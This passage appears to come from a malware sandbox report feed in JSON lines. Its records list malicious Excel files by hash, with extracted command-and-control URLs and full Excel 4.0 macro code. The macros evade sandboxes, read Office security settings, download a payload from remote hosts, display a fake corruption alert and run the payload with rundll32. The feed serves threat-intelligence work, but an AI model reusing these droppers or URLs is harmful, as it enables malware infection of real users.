CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"S8lb2xwqhb\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bc2a7e62cce86f9fd2235602a9225646b6348e5739dc70eb95e2b743101bd227"},"analysis":{"reported":"2020-04-09T16:18:36Z","score":10},"files":[{"filename":"bc2a7e62cce86f9fd2235602a9225646b6348e5739dc70eb95e2b743101bd227","filesize":185344,"md5":"2defea66648c73da38616377799b5063","sha1":"4b2e0ba5329bd2ca91932e880f4da3af249fd929","sha256":"bc2a7e62cce86f9fd2235602a9225646b6348e5739dc70eb95e2b743101bd227","sha512":"c44db0b4cf35999297ab03b375cdec7a4a877b8800a0196e728c97e3d14fe77bb2fbb3b29f6105b1860d8f6f4b941b68dd8b2251adb8751038f95698961c5963","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bc2a7e62cce86f9fd2235602a9225646b6348e5739dc70eb95e2b743101bd227.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bc39d3bb128f329d95393bf0a4f6ec813356e847a00794c18258bfa48df6937f"},"analysis":{"reported":"2020-04-09T16:18:36Z","score":10},"files":[{"filename":"bc39d3bb128f329d95393bf0a4f6ec813356e847a00794c18258bfa48df6937f","filesize":144384,"md5":"54231fe890dcb4b6c202dc59dc95697b","sha1":"dd032099968db90fb87bcd921e6a23b534b0258d","sha256":"bc39d3bb128f329d95393bf0a4f6ec813356e847a00794c18258bfa48df6937f","sha512":"488a2509eaa2064ee1025fd4e751637aad7e0dd9a4e42360308d7fc93b26f534b3e6eda92cd76b81abf4fc5034b88b31fe3f2f0c1847c90a8302ae199e05b29f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bc39d3bb128f329d95393bf0a4f6ec813356e847a00794c18258bfa48df6937f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"0TQ1ByZPP5\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bc6474ff04483a2a235d725c8f48ef5ab3574129395b0ecca356568f342afc4b"},"analysis":{"reported":"2020-04-09T16:18:36Z","score":10},"files":[{"filename":"bc6474ff04483a2a235d725c8f48ef5ab3574129395b0ecca356568f342afc4b","filesize":207360,"md5":"ecb7c073fd50f0cf1ec77792ca712c40","sha1":"0236a0a5c35dc5c3eb3d636ebd28893ee0ba44b9","sha256":"bc6474ff04483a2a235d725c8f48ef5ab3574129395b0ecca356568f342afc4b","sha512":"af2e9b53f4eb2f1fa44647ca7f486f07eb5d877df8cef293576e25b0a04716849446cacb4fb83ad1aa8619398a5cc74bd893c1ea41a40f4d17a176fb4833bc45","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bc6474ff04483a2a235d725c8f48ef5ab3574129395b0ecca356568f342afc4b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-cran.php","https://narensyndicate.com/wp-cran.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-cran.php\",\"c:\\Users\\Public\\cskc75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-cran.php\",\"c:\\Users\\Public\\cskc75ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cskc75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1lVZmoTpdx\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bc66d3805b1b5e6c47311e4b5fd68782675e468eb26ae24f702857a25358e33e"},"analysis":{"reported":"2020-04-09T16:18:36Z","score":10},"files":[{"filename":"bc66d3805b1b5e6c47311e4b5fd68782675e468eb26ae24f702857a25358e33e","filesize":185344,"md5":"5ca8391d52e49ee940930bbaffe78cc5","sha1":"94837c3b7a60769476454d779abe0015007a0bb8","sha256":"bc66d3805b1b5e6c47311e4b5fd68782675e468eb26ae24f702857a25358e33e","sha512":"08a184266d52c3244919fe022ed14bebdbc55e38582682e5493662eca55d4eb4f7cf72a0d88d3011f7dd477dc0cff3da51b039295f4ce5b7ce2f61bea7d00f32","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bc66d3805b1b5e6c47311e4b5fd68782675e468eb26ae24f702857a25358e33e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bc7515979ad6b09659ab4dec8026f4a73ad7aab0994486e187ed6929afb571fa"},"analysis":{"reported":"2020-04-09T16:18:36Z","score":10},"files":[{"filename":"bc7515979ad6b09659ab4dec8026f4a73ad7aab0994486e187ed6929afb571fa","filesize":209920,"md5":"07e945be93a01a6a44c5c4afe2077d41","sha1":"37ea00fc3c01424687c93780807872b48c03e64f","sha256":"bc7515979ad6b09659ab4dec8026f4a73ad7aab0994486e187ed6929afb571fa","sha512":"e4769e11a6b28e7fa0a6391437d48636dc152d33f60d11b4560f635ef36c22ddf7135002f2c71a25d92b416ed873e3de2e30277657b135b6beb1244c9b293326","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bc7515979ad6b09659ab4dec8026f4a73ad7aab0994486e187ed6929afb571fa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JS3E6ayM0u\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bc7892bc79f765d6acb95e7e7cf72cfe0fabb2e43f6d0b74c1ce3e57e1562005"},"analysis":{"reported":"2020-04-09T16:18:36Z","score":10},"files":[{"filename":"bc7892bc79f765d6acb95e7e7cf72cfe0fabb2e43f6d0b74c1ce3e57e1562005","filesize":170496,"md5":"0b0aa63eaaca7daabf3750fc74b2a95e","sha1":"194700283e6d6c7bd9e39b579d5f63416906e262","sha256":"bc7892bc79f765d6acb95e7e7cf72cfe0fabb2e43f6d0b74c1ce3e57e1562005","sha512":"d5ca564b88147cbf7d540e852a785fc142f4950180993324a5d31b5ef5e4b33a6bde70be296cef1ecb45395309792b0818c6c6dc85ce59a50fab602afd646c35","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bc7892bc79f765d6acb95e7e7cf72cfe0fabb2e43f6d0b74c1ce3e57e1562005.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Rh9a4ltAmQ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bc7ac6d5d5a8f004edfcfc208fdf8cdeee392c15df7b4c2a36fdd2f3310ccc37"},"analysis":{"reported":"2020-04-09T16:18:36Z","score":10},"files":[{"filename":"bc7ac6d5d5a8f004edfcfc208fdf8cdeee392c15df7b4c2a36fdd2f3310ccc37","filesize":185344,"md5":"413f2ec3e472a43afaf31a317b4f42d4","sha1":"6a7f3187228f45cf263e5efc4a00c98e0d5ed696","sha256":"bc7ac6d5d5a8f004edfcfc208fdf8cdeee392c15df7b4c2a36fdd2f3310ccc37","sha512":"9efbf99b2d6a996b459011d5606bfee44166ed60d9789f4da7e403cce059a395ed3c4da233bf55b936edb2935c2fefad5441a1435274db85fb98494b0ea1511f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bc7ac6d5d5a8f004edfcfc208fdf8cdeee392c15df7b4c2a36fdd2f3310ccc37.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bc7b5c474ce44701142bbfceb9333cd8a852b3a32171cceeb192cad936ca15ad"},"analysis":{"reported":"2020-04-09T16:18:36Z","score":10},"files":[{"filename":"bc7b5c474ce44701142bbfceb9333cd8a852b3a32171cceeb192cad936ca15ad","filesize":170496,"md5":"834f38fa1d318b79d944b44250f9c069","sha1":"e5c654fd641bbbdf15c4efb563ae738ae333d06d","sha256":"bc7b5c474ce44701142bbfceb9333cd8a852b3a32171cceeb192cad936ca15ad","sha512":"9eda28eb9e2b46891db0662bbc5d337e7bfdf92bc47640addc36cf16ffedb83d463603b1783c891b65a716848f3d4c9a813f59b051b9318857796cd30a0b02ff","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bc7b5c474ce44701142bbfceb9333cd8a852b3a32171cceeb192cad936ca15ad.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QXdflKTw4y\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bc7cd946ff557ccf62d876dade47e2a834f11073c85df4cca3a3f272d8da5c50"},"analysis":{"reported":"2020-04-09T16:18:36Z","score":10},"files":[{"filename":"bc7cd946ff557ccf62d876dade47e2a834f11073c85df4cca3a3f272d8da5c50","filesize":206336,"md5":"cc49b93d88500d847d4f85cb1d40918d","sha1":"0aa0d2cef690ac70e325ed0e7450ab65a4f0821d","sha256":"bc7cd946ff557ccf62d876dade47e2a834f11073c85df4cca3a3f272d8da5c50","sha512":"19102d52c2522c0f1263d47b4ec463f9f56c4578abaa479704ae96d96e6ff54bc362b05de7751f43e1b56b3426768267edd1df4a24a05240cfc3d3f2717beadc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bc7cd946ff557ccf62d876dade47e2a834f11073c85df4cca3a3f272d8da5c50.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rkNuCP5zS4\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bcac5d6d16039a2f6cfe13a82c04f519b13055967bfdc509a38f93657c793d1e"},"analysis":{"reported":"2020-04-09T16:18:37Z","score":10},"files":[{"filename":"bcac5d6d16039a2f6cfe13a82c04f519b13055967bfdc509a38f93657c793d1e","filesize":144384,"md5":"efa310f6d27d81c579ed6b3aa463747f","sha1":"0da44edc3752c46cac246a77ea36c10d57217392","sha256":"bcac5d6d16039a2f6cfe13a82c04f519b13055967bfdc509a38f93657c793d1e","sha512":"90861f0da3f78b2bd38d8cc3f252cd1ea371818f469460e3bacffc8ccc6e01f5d6f2f21cacda6bca51c88e159b190e2f69740b46639e9a52ef197331da6ea3eb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bcac5d6d16039a2f6cfe13a82c04f519b13055967bfdc509a38f93657c793d1e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"7wKMEW1yYC\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bcaeb4dcb572ee3ca8970f186095f794c06c8b3857206a2ce33a468b1eb11199"},"analysis":{"reported":"2020-04-09T16:18:37Z","score":10},"files":[{"filename":"bcaeb4dcb572ee3ca8970f186095f794c06c8b3857206a2ce33a468b1eb11199","filesize":112128,"md5":"d593d0bfd842b451ceddc16988dbf8fa","sha1":"c9e73b7a4b9f3b2140c8891333945fabaa1f926f","sha256":"bcaeb4dcb572ee3ca8970f186095f794c06c8b3857206a2ce33a468b1eb11199","sha512":"e49deae3607493c595a8363ec04053892bfcca3cd419c9ffc306ba45d1a50ff0e746b6d95c7a8970bf7ec3e6f2c0e9c2142775747cd234615371bbbac9d8ad85","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bcaeb4dcb572ee3ca8970f186095f794c06c8b3857206a2ce33a468b1eb11199.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bcb51d9c3b677e079afc7c2e87aaa48935419467931ba690801ee3ef0a8fd775"},"analysis":{"reported":"2020-04-09T16:18:37Z","score":10},"files":[{"filename":"bcb51d9c3b677e079afc7c2e87aaa48935419467931ba690801ee3ef0a8fd775","filesize":206336,"md5":"30d996896add889a5430395095259175","sha1":"ecfd5b57a97d0c1b827a4908fbcb39178dcab645","sha256":"bcb51d9c3b677e079afc7c2e87aaa48935419467931ba690801ee3ef0a8fd775","sha512":"7d6ef0c474b85afb445e6b379957c3657fead8af1b47dd96800cb8aac9cd7241340b1e0abf611af2fa765102717494295f76a194054774ffdae955c3a0733ad2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bcb51d9c3b677e079afc7c2e87aaa48935419467931ba690801ee3ef0a8fd775.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MR1zmykZki\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bcb920d8c16f3dc357467ee8978076621759819f4e0b2b0f1376901c7b388ad5"},"analysis":{"reported":"2020-04-09T16:18:37Z","score":10},"files":[{"filename":"bcb920d8c16f3dc357467ee8978076621759819f4e0b2b0f1376901c7b388ad5","filesize":160768,"md5":"c603adcb963c6862801b53ad78a30be7","sha1":"b0e984add334e4cd67b3ec7e71d4f158d9c7bca3","sha256":"bcb920d8c16f3dc357467ee8978076621759819f4e0b2b0f1376901c7b388ad5","sha512":"fea03e34f42e427f8b8e02511a0f8b1e04e7f46d129680fab1f9c4d0d57783e5f20b17dda28dfb462d3e9652931ef428fb101f54cbcc8457f9809752abdda9b7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bcb920d8c16f3dc357467ee8978076621759819f4e0b2b0f1376901c7b388ad5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8mkb5a2wgp\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bcbe1c20e1f044b7eb3fa4cd0614396aacb87ff1e9286c31f9f080c922be3adb"},"analysis":{"reported":"2020-04-09T16:18:37Z","score":10},"files":[{"filename":"bcbe1c20e1f044b7eb3fa4cd0614396aacb87ff1e9286c31f9f080c922be3adb","filesize":112640,"md5":"3ccd61f889d371c6f5d96d3b2500aa3b","sha1":"544683e5c8aa872e58cfb51903da1c48f082fab9","sha256":"bcbe1c20e1f044b7eb3fa4cd0614396aacb87ff1e9286c31f9f080c922be3adb","sha512":"bc63ef06470240b3716b16377925e932d0ed8cc58e3fc6b4972f718933f26d6b6199ddfee54bb33a2dddceed8072c094e01014a50b9799bbd976b5ff58845012","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bcbe1c20e1f044b7eb3fa4cd0614396aacb87ff1e9286c31f9f080c922be3adb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bcd07fdff72cc069e268b81ec3774add9f3777cd4f1bfd4a80bb5632b1d91ff0"},"analysis":{"reported":"2020-04-09T16:18:37Z","score":10},"files":[{"filename":"bcd07fdff72cc069e268b81ec3774add9f3777cd4f1bfd4a80bb5632b1d91ff0","filesize":212992,"md5":"1c098329bca76bafcaec9bb54ff3b5e9","sha1":"6f0f56a5e644973fd1bd709b9cb4be98467b2a12","sha256":"bcd07fdff72cc069e268b81ec3774add9f3777cd4f1bfd4a80bb5632b1d91ff0","sha512":"60726401577c47af7c3b0475aaa47e3341d690d2ee9b9fa3b21cc21f2642d026f19640fddbb75b9df4907ac1d82fccb7890fe78928882735e3b0d574af2e53f6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bcd07fdff72cc069e268b81ec3774add9f3777cd4f1bfd4a80bb5632b1d91ff0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 